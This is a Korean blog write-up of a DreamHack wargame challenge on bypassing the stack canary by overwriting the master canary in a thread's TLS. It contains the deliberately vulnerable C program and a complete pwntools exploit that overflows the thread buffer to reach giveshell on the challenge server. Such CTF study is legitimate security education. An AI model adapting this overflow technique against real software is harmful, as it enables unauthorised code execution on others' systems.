CIDY
[System_Hacking] AD: stage3_문제풀이(Master Canary) 본문
// 64-bit, canary, nx, partial relro
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void giveshell() { execve("/bin/sh", 0, 0); }
void init() {
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
}
int read_bytes (char *buf, int len) {
int idx = 0;
int read_len = 0;
for (idx = 0; idx < len; idx++) {
int ret;
ret = read(0, buf+idx, 1);
if (ret < 0) {
return read_len;
}
read_len ++;
}
return read_len;
}
void thread_routine() {
char buf[256];
int size = 0;
printf("Size: ");
scanf("%d", &size);
printf("Data: ");
//read(0, buf, size);
read_bytes(buf, size);
}
int main() {
pthread_t thread_t;
init();
if (pthread_create(&thread_t, NULL, (void *)thread_routine, NULL) < 0) {
perror("thread create error:");
exit(0);
}
pthread_join(thread_t, 0);
return 0;
}
아까랑 비슷하니 오프셋 구하는 과정은 생략.
($fs_base + 0x28 주소 - [rbp - 0x110])
자세한 오프셋 구하기 과정은 여기 ↓
https://orcinus-orca.tistory.com/69
[System_Hacking] AD: stage3_Master Canary2
#define THREAD_COPY_STACK_GUARD(descr) \ ((descr)->header.stack_guard \ = THREAD_GETMEM (THREAD_SELF, header.stack_guard)) int __pthread_create_2_1 (pthread_t *newthread, const pthread_attr_t *attr,..
orcinus-orca.tistory.com
from pwn import *
p = remote("host3.dreamhack.games", 17802)
#p = process("./mc_thread")
e = ELF("./mc_thread")
pay = b"A" * 0x110
pay += b"B" * 0x8
pay += p64(e.sym['giveshell'])
pay += b"C" * ((0x948) - len(pay))
pay += b"A" * 0x8
p.sendlineafter(b"Size: ", str(0x950))
p.sendafter(b"Data: ", pay)
p.interactive()
'Hack > DreamHack(로드맵)' 카테고리의 다른 글
[System_Hacking] AD: stage4_문제풀이(Overwrite _rtld_global) (0) | 2022.07.14 |
---|---|
[System_Hacking] AD: stage4__rtld_global (0) | 2022.07.12 |
[System_Hacking] AD: stage3_Master Canary2 (0) | 2022.07.11 |
[System_Hacking] AD: stage3_문제풀이(master canary) (0) | 2022.07.11 |
[System_Hacking] AD: stage3_Master Canary (0) | 2022.07.11 |